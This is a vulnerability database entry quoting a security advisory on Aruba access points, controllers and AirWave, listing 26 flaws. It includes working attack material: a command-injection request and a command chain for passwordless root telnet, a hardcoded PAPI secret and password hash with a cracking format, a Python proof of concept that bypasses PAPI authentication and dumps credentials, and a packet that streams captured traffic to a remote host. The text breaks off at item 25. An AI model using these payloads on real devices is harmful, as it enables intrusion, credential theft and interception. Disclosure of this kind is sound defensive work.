VARIoT IoT vulnerabilities database

The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN. The Aruba Mobility Controller Management Interface contains a buffer overflow. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system. Aruba Mobility Controller is prone to multiple vulnerabilities that may lead to authentication bypass, remote code execution, denial-of-service conditions. Aruba ArubaOS/Aruba Instant/AirWave Management - Multiple Vulnerabilities ------------------------------------------------------------------------- Introduction ============ Multiple vulnerabilities were identified in Aruba AP, IAP and AMP devices. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Several of the high severity vulnerabilities listed in this report are related to the Aruba proprietary PAPI protocol and allow remote compromise of affected devices. Affected Software And Versions ============================== - ArubaOS (all versions) - AirWave Management Platform 8.x prior to 8.2 - Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) CVE === The following CVE were assigned to the issues described in this report: - CVE-2016-2031 - CVE-2016-2032 Vulnerability Overview ====================== 1. AMP: RabbitMQ Management interface exposed 2. AMP: XSRF token uses weak calculation algorithm 3. AMP: Arbitrary modification of /etc/ntp.conf 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) 5. (I)AP: Insecure transmission of login credentials (GET) 6. (I)AP: Built in privileged "support" account 7. (I)AP: Static password hash for support account 8. (I)AP: Unusual account identified ("arubasecretadmin") 9. (I)AP: Privileged remote code execution 10. (I)AP: Radius passwords allow arbitrary raddb commands 11. (I)AP: Unauthenticated disclosure of environment variables 12. (I)AP: Information disclosure by firmware checking functionality 13. (I)AP: Unauthenticated automated firmware update requests 14. (I)AP: Firmware updater does not check certificates 15. (I)AP: Forceful downgrade of FW versions possible 16. (I)AP: Firmware update check discloses machine certificate 17. (I)AP: Firmware is downloaded via unencrypted connection 18. (I)AP: Firmware update Challenge/Response does not protect the Client 19. (I)AP: Unencrypted private keys and certs 20. (I)AP: Potential signature private key 21. (I)AP: PAPI Endpoints exposed to all interfaces 22. (I)AP: PAPI Endpoint does not validate MD5 signatures 23. (I)AP: PAPI protocol encrypted with weak encryption algorithm 24. (I)AP: PAPI protocol authentication bypass 25. (I)AP: Broadcast with detailed system information (LLDP) 26. (I)AP: User passwords are encrypted with a static key Vulnerability Details ===================== --------------------------------------------- 1. AMP: RabbitMQ Management interface exposed --------------------------------------------- AMPs expose the management frontend for the RabbitMQ message queue on all interfaces via tcp/15672 and tcp/55672. # netstat -nltp | grep beam tcp 0 0 127.0.0.1:5672 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 127.0.0.1:17716 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:15672 0.0.0.0:* LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:55672 0.0.0.0:* LISTEN 2830/beam.smp The password for the default user "airwave" is stored in the world readable file /etc/rabbitmq/rabbitmq.config in plaintext: # ls -l /etc/rabbitmq/rabbitmq.config -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config # grep default_ /etc/rabbitmq/rabbitmq.config {default_user,<<"airwave">>}, {default_pass,<<"***REMOVED***">>} -------------------------------------------------- 2. AMP: XSRF token uses weak calculation algorithm -------------------------------------------------- The XSRF token is calculated based on limited sources of entropy, consisting of the user's time of login and a random number between 0 and 99999. The algorithm Is approximated by the following example Python script: base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()), random.randint(0,99999))).digest()) ----------------------------------------------- 3. AMP: Arbitrary modification of /etc/ntp.conf ----------------------------------------------- Incorrect/missing filtering of input parameters allows injecting new lines and arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the web frontend. POST /nf/pref_network? HTTP/1.1 Host: 192.168.131.162 [...] id=&ip_1=192.168.131.162&hostname_1=foo.example.com& subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1& dns2_1=&eth1_enabled_1=0&eth1_ip_1=&eth1_netmask_1=& ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save The above POST requests results in the following ntp.conf being generated: # cat /etc/ntp.conf [...] server time1.example.com foo server time2.example.com ------------------------------------------------------------------------------ 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) ------------------------------------------------------------------------------ PAPI packets sent from an AP to an AMP are authenticated with a cryptographic checksum. The packet format is only partially known, as it's a proprietary format created by Aruba. A typical PAPI packet sent to an AMP is as follows: 0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I.. 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F... The following dissection of the above shown packet gives a more detailed overview of the format: 49 72 ID 00 02 Version 64 69 86 2d PAPI Destination IP 7f 00 00 01 PAPI Source IP 01 00 Unknown1 01 00 Unknown2 20 1f PAPI Source Port 20 1e PAPI Destination Port 00 01 Unknown3 00 00 Unknown4 00 01 Sequence Number 3e f9 Unknown5 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum The checksum is based on a MD5 hash of a padded concatenation of all fields and a secret token. The secret token is hardcoded in multiple binaries on the AMP and can easily be retrieved via core Linux system tools: $ strings /opt/airwave/bin/msgHandler | grep asd asdf;lkj763 Using this secret token it is possible to craft valid PAPI packets and issue commands to the AMP, bypassing the authentication based on the shared secret / token. This can be exploited to compromise of the device. Random sampling of different software versions available on Aruba's website confirmed that the shared secret is identical for all versions. ------------------------------------------------------- 5. AP: Insecure transmission of login credentials (GET) ------------------------------------------------------- Username and password to authenticate with the AP web frontend are transmitted through HTTP GET. This method should not be used in a form that transmits sensitive data, because the data is displayed in clear text in the URL. GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1 The login URL can potentially appear in Proxy logs, the server logs or browser history. This possibly discloses the authentication data to unauthorized persons. -------------------------------------------- 6. AP: Built in privileged "support" account -------------------------------------------- The APs provide a built in system account called "support". When connected to the restricted shell of the AP via SSH, issuing the command "support", triggers a password request: 00:0b:86:XX:XX:XX# support Password: A quick internet search clarified, that this password is meant for use by Aruba engineers only: http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760 Further research on that functionality lead to the conclusion that this functionality provides root-privileged shell access to the underlying operating system of the AP, given the correct password is entered. ----------------------------------------------- 7. AP: Static password hash for support account ----------------------------------------------- The password hash for the "support" account mentioned in vulnerability #6 is stored in plaintext on the AP. $ strings /aruba/bin/cli | grep ^bc5 bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14 Random sampling of different versions of Firmware images available on Aruba's website confirmed that the password hash is identical for all versions. The password check validating a given "support" password is based on the following algorithm: SALT + sha1(SALT + PASSWORD) Where SALT equals the first 5 bytes of the password hash in binary representation. It is possible to run a brute-force attack on this hash format using JtR with the following input format: support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601 ------------------------------------------------------ 8. AP: Unusual account identified ("arubasecretadmin") ------------------------------------------------------ The AP's system user configuration contains a undocumented account called "arubasecretadmin". This account was the root cause for CVE-2007-0932 and allowed administrative login with a static password. /etc/passwd: nobody:x:99:99:Nobody:/:/sbin/nologin root:x:0:0:Root:/:/bin/sh admin:x:100:100:Admin:/:/bin/telnet3 arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2 serial:x:102:100:Serial:/:/bin/telnet4 Further tests indicated that login with this account seems not possible as it is not mapped through Arubas authentication mechanisms. The reason for it being still configured on the system is unknown. --------------------------------------- 9. AP: Privileged remote code execution --------------------------------------- Insufficient checking of parameters allows an attacker to execute commands with root privileges on the AP. The vulnerable parameter is "image_url" which is used in the Firmware update function. GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084 HTTP/1.1 The above example starts a new instance of mini_httpd on tcp/1234, which allows browsing the AP's filesystem. The following list of commands, if executed in order, start a telnet service that allows passwordless root login. killall -9 utelnetd touch /tmp/telnet_enable echo \#\!/bin/sh > /bin/login echo /bin/sh >> /bin/login chmod +x /bin/login /sbin/utelnetd Connecting to the telnet service started by the above command chain: # telnet 10.0.XX.XX Trying 10.0.XX.XX... Connected to 10.0.XX.XX. Escape character is '^]'. Switching to Full Access /aruba/bin # echo $USER root /aruba/bin # Potential exploits of this vulnerability can be detected through the AP's log file: [...] Jan 1 02:43:47 cli[2052]: <341004> <WARN> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| http://10.0.XX.XX/?"`/sbin/utelnetd`" [...] ------------------------------------------------------- 10. AP: Radius passwords allow arbitrary raddb commands ------------------------------------------------------- Insufficient checking of the GET parameter "cmd" allows the injection of arbitrary commands and configuration parameters in the raddb configuration. Example: GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548 HTTP/1.1 /aruba/radius/raddb/users: foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah" As shown in the above example, inserting a double-quote in the password allows to add additional commands after the password. ----------------------------------------------------------- 11. AP: Unauthenticated disclosure of environment variables ----------------------------------------------------------- It is possible to request a listing of environment variables by requesting a specific URL on the AP's web server. The request does not require authentication. GET /swarm.cgi?opcode=printenv HTTP/1.1 HTTP/1.0 200 OK Content-Type:text/plain; charset=utf-8 Pragma: no-cache Cache-Control: max-age=0, no-store Environment variables CHILD_INDEX=0 PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/lib SERVER_SOFTWARE= SERVER_NAME=10.0.XX.XX GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0 SERVER_PORT=4343 REQUEST_METHOD=GET SCRIPT_NAME=/swarm.cgi QUERY_STRING=opcode=printenv REMOTE_ADDR=10.0.XX.XX REMOTE_PORT=58804 HTTP_REFERER=https://10.0.XX.XX:4343/ HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0 HTTP_HOST=10.0.XX.XX:4343 ----------------------------------------------------------------- 12. AP: Information disclosure by firmware checking functionality ----------------------------------------------------------------- When the AP checks device.arubanetworks.com for a new firmware version, it sends detailed information of the AP in plaintext to the remote host. POST /firmware HTTP/1.1 Host: device.arubanetworks.com Content-Length: 2 Connection: keep-alive X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: ***REMOVED (Company Internal Name)*** X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 ---------------------------------------------------------- 13. AP: Unauthenticated automated firmware update requests ---------------------------------------------------------- The web frontend of the AP provides functionality to initiate an automated firmware update. Doing so triggers the AP to initiate communication with device.arubanetworks.com and automatically download and install a new firmware image. The CGI opcode for that automatic update is "image-server-check" and it was discovered that the "sid" parameter is not checked for this opcode. Therefor an attacker can issue the automatic firmware update without authentication by sending the following GET request to the AP. GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x As shown above, the "sid" parameter has to be submitted as part of the URL, but can be set to anything. Although all opcode actions follow the same calling scheme, "image-server-check" was the only opcode where the session ID was not validated. Combined with other vulnerabilities (#14, #15), this could be exploited to install an outdated, vulnerable firmware on the AP. ---------------------------------------------------- 14. AP: Firmware updater does not check certificates ---------------------------------------------------- The communication between AP and device.arubanetworks.com is secured by using SSL. The AP does not do proper certificate validation for the communication to device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a self-signed certificate allowed interception of the traffic between AP and device.arubanetworks.com. -------------------------------------------------- 15. AP: Forceful downgrade of FW versions possible -------------------------------------------------- When checking device.arubanetworks.com for a new firmware image, the AP sends it's current version to the remote host. If there is no new firmware available, device.arubanetworks.com does not provide any download options. If the initial version sent from the AP is modified by an attacker (via MiTM), the remote server will reply with the current firmware version. The AP will then reject that firmware, as it's current version is more recent/the same. Downgrading the version does also not work based on the validation the AP does. This behaviour can be overwritten if an attacker intercepts and modifies the reply from device.arubanetworks.com and adds X-header called "X-Mandatory-Upgrade". Example of a spoofed reply from device.arubanetworks.com: HTTP/1.0 200 OK Date: Wed, 11 Nov 2015 12:12:20 GMT Content-Length: 91 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check X-Mandatory-Upgrade: true Connection: close 6.4.2.6-4.1.1.10_51810 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 As shown above, the Header "X-Mandatory-Upgrade" was added to the server's reply. This causes the AP to skip its validation checks and accept any firmware version provided, regardless if it is the same or older than the current one. ----------------------------------------------------------- 16. AP: Firmware update check discloses machine certificate ----------------------------------------------------------- While observing the traffic between an AP and device.arubanetworks.com, it was discovered that the AP discloses it's machine certificate to the remote endpoint. POST /firmware HTTP/1.1 Host: 10.0.XX.XX Content-Length: 2504 Connection: close X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: ***REMOVED (Company Internal Name)*** X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 X-Challenge-Hash: SHA-1 -----BEGIN CERTIFICATE----- MIIGTjCCBTagAwI... [...] -----END CERTIFICATE----- The certificate sent in the above request is the same (in PEM format) as found under the following path on the AP: /tmp/deviceCerts/certifiedKeyCert.der Comparison of the certificate from the HTTP Request and from the AP filesystem: $ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 dumped-fw-cert.txt 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 certifiedKeyCert.der.pem --------------------------------------------------------- 17. AP: Firmware is downloaded via unencrypted connection --------------------------------------------------------- Firmware images are downloaded via unencrypted HTTP to the AP. An example reply containing the download paths looks as follows: HTTP/1.1 200 OK Date: Wed, 11 Nov 2015 13:18:58 GMT Content-Length: 552 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check Connection: close 6.4.2.6-4.1.1.10_51810 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810 An attacker could potentially MiTM connections to images.arubanetworks.com and possibly replace the firmware images downloaded by the AP. ---------------------------------------------------------------------- 18. AP: Firmware update Challenge/Response does not protect the Client ---------------------------------------------------------------------- The update check process between AP and device.arubanetworks.com works as follows: AP => device.arubanetworks.com POST /firmware X-Type: firmware-check AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... X-Challenge: 123123... AP => device.arubanetworks.com POST /firmware X-Session-Id: bd4... [machine certificate] [signature] AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... [firmware image urls] When inspecting the communication process carefully, it is clear that the final response from device.arubanetworks.com does not contain any (cryptographic) signature. An attacker could impersonate device.arubanetworks.com, send an arbitrary challenge, ignore the response and just reply with a list of firmware images. The only thing that has to be kept the same over requests is the X-Session-Id header, which is also sent initially by the remote host and not the AP and therefore under full control of the attacker. ------------------------------------------ 19. AP: Unencrypted private keys and certs ------------------------------------------ The AP firmware image contains the unencrypted private key and certificate for securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key and cert was found under the path /aruba/conf/cpprivkey.pem. $ openssl x509 -in cpprivkey.pem -text -noout Certificate: Data: Version: 3 (0x2) Serial Number: 121426 (0x1da52) Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL, CN=GeoTrust DV SSL CA Validity Not Before: May 11 01:22:10 2011 GMT Not After : Aug 11 04:40:59 2017 GMT Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF, C=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See www.geotrust.com/resources/cps (c)11, OU=Domain Control Validated - QuickSSL(R) Premium, CN=securelogin.arubanetworks.com [...] $ openssl rsa -in cpprivkey.pem -check RSA key ok writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA…. [...] -----END RSA PRIVATE KEY----- --------------------------------------- 20. AP: Potential signature private key --------------------------------------- A potential SSL key was found under the path /etc/sig.key. Based on the header (3082xxxx[02,03]82), the file looks like a SSL key in DER format: $ xxd etc/sig.key 00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb 0.........-q.... It was not possible to decode the key. Therefore it's not 100% clear if is an actual key or just a garbaged file. ------------------------------------------------ 21. AP: PAPI Endpoints exposed to all interfaces ------------------------------------------------ The PAPI endpoint "msgHandler" creates listeners on all interfaces. Therefore it is reachable via wired and wireless connections to the AP. This increases the potential attack surface. # netstat -nlu | grep :82 udp 0 0 :::8209 :::* udp 0 0 :::8211 :::* Additionally the local ACL table of the AP contains a default firewall rule, permitting any traffic to udp/8209-8211, overwriting any manually set ACL to block access to PAPI: 00:0b:86:XX:XX:XX# show datapath acl 106 Datapath ACL 106 Entries ----------------------- Flags: P - permit, L - log, E - established, M/e - MAC/etype filter S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror I - Invert SA, i - Invert DA, H - high prio, O - set prio, C - Classify Media A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6 K - App Throttle, d - Domain DA ---------------------------------------------------------------- 1: any any 17 0-65535 8209-8211 P4 [...] 12: any any any P4 00:0b:86:XX:XX:XX# ------------------------------------------------------ 22. AP: PAPI Endpoint does not validate MD5 signatures ------------------------------------------------------ MD5 signature validation for incoming PAPI packets is disabled on the AP: # ps | grep msgHandler 1988 root 508 S < /aruba/bin/msgHandler -n # /aruba/bin/msgHandler -h usage: msgHandler [-d] [-n] -d = enable debug prints. -n = disable md5 signatures. -g = disable garbling. The watchdog service ("nanny") also restarts the PAPI handler with disabled MD5 signature validation: # grep msgH /aruba/bin/nanny_list RESTART /aruba/bin/msgHandler -n -------------------------------------------------------------- 23. AP: PAPI protocol encrypted with weak encryption algorithm -------------------------------------------------------------- PAPI packets sent to an AP contain an encrypted payload. The encryption seems to replace the MD5 signature check as described in #4 and used when PAPI is sent from AP to AMP. This might also explain why the PAPI endpoint runs with disabled MD5 signature verification on the AP (see #22). The following example shows an encrypted PAPI packet for the command "show version" as received by the AP: 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93 ................ 0050 a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97 .....n.......... 0060 93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd ................ 0070 fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb ................ 0080 fc e4 b3 e5 f6 e1 e0 fa fc fd 99 ........... Important parts of the above packet: 7f 00 00 01 Destination IP (127.0.0.1) 0a 00 00 01 Source IP (10.0.0.1) 3b 60 Destination Port (15200) 3b 7e Source Port (15230) 97 93 93 93-EOF Encrypted PAPI payload Comparison of the above packet with a typical PAPI packet that is sent from the AP to the AMP quickly highlights the missing 0x00 that are used to pad certain fields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which is a clear indication that the payload is "encrypted" with a 1 byte XOR. As XOR'ing 0x00 with 1 byte results in the same byte, the payload therefore discloses the key used and use of the weak XOR algorithm: 0x00: 00000000 ^ 0x93: 10010011 ================ 10010011 (0x93) The following shows the above PAPI packet for "show version" with its payload decrypted: 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh 0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version. (The string starting with "zxr..." is a HTTP session ID, see #25 on details how to bypass this). An example Python function for en-/decrypting PAPI payloads could look like this: def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) ------------------------------------------- 24. AP: PAPI protocol authentication bypass ------------------------------------------- Besides it's typical use between different Aruba devices, PAPI is also used as an inter-process communication (IPC) mechanism between the CGI based web frontend and the backend processes on the AP. Certain commands that can be sent via PAPI are only supposed to be used via this IPC interface and not from an external source. Besides the weak "encryption" that is described in #23, some PAPI packets contain a HTTP session ID (SID), that matches the SID issued at login to the web frontend. Example IPC packet (payload decrypted as shown in #23): 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn 0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a . The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that indicates the length of the 20 byte SID. If the session is expired or an invalid session is specified, the packet is rejected by the PAPI endpoint (msgHandler). Replacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore allows unauthenticated PAPI communication with the AP. Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for readability): 0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............ 0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ........... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................ 0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @............... 0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh 0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration 0090 0a Using the above example, it is possible to request the system configuration from an AP, bypassing all authentication methods. If the above packet is sent using IPC from the webfrontend cgi to the backend, (localhost) the reply looks like follows: msg_ref 303 /tmp/.cli_msg_SW9iVE The cgi binary then reads this file and renders the content in the HTTP reply. If the PAPI packet comes from an external address (instead of localhost) the reply points to the APs web server (10.0.0.26 in this case) instead of /tmp/: msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh Access to this file does not require authentication which raises the severity of this vulnerability significantly. The following Python script is a proof of concept for this vulnerability, sending a "show configuration" packet to an AP with the IP address 10.0.0.26: import socket def aruba_encrypt(s): return ''.join([chr(ord(c) ^ 0x93) for c in s]) header = ( '\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13' '\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ) payload = ( # show configuration '\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06' '\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61' '\x74\x69\x6f\x6e\x0a' ) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('', 1337)) sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211)) buff = sock.recvfrom(4096) print aruba_encrypt(buff[0]) Executing the above PoC: # python arupapi.py [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh Downloading the file referenced by the reply returns the full AP configuration, including all users, passwords and settings (no auth is required on the HTTP request either): # curl -Lk http://10.0.0.26/.cli_msg_n011xh version 6.4.2.0-4.1.1 virtual-controller-country XX virtual-controller-key b49ff***REMOVED*** name instant-XX:XX:XX terminal-access clock timezone none 00 00 rf-band all [...] mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa [...] (full configuration file continues) For APs running in "managed mode", the above shown exploit does not work. The reason for that is, that these APs don't provide a web server and have only a limited set of commands that can be executed via PAPI. Additionally, APs in managed mode do not seem to use the XOR based "encryption" or MD5 checksums - there was no authentication/encryption found at all. One interesting payload for APs in "managed mode" using the limited subset of available commands is the ability to capture traffic and send it to a remote endpoint via UDP. The example command on the controller would be: (aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1 100.105.134.45 1337 0 radio 0 This command would send all traffic of AP 192.168.0.1 from the first radio interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet would look like this: 0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir.............. 0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6..... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e 0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj 0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect............. 0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............ 0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A 0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU 00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT 00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START. 00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP 00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168. 00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip. 00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45 0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port.. 0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format.. 0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0.. 0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se 0140 63 61 00 00 04 72 6f 6f 74 ca...root When sending this packet to an AP running in managed mode, it confirms the command and starts sending traffic to the specified host: [...]<re><data name="Packet capture has started for pcap-id" pn="true">1</data></re> --------------------------------------------------------- 25. AP: Broadcast with detailed system information (LLDP) --------------------------------------------------------- Aruba APs broadcast detailed system and version information to the wired networks via LLDP (Link Layer 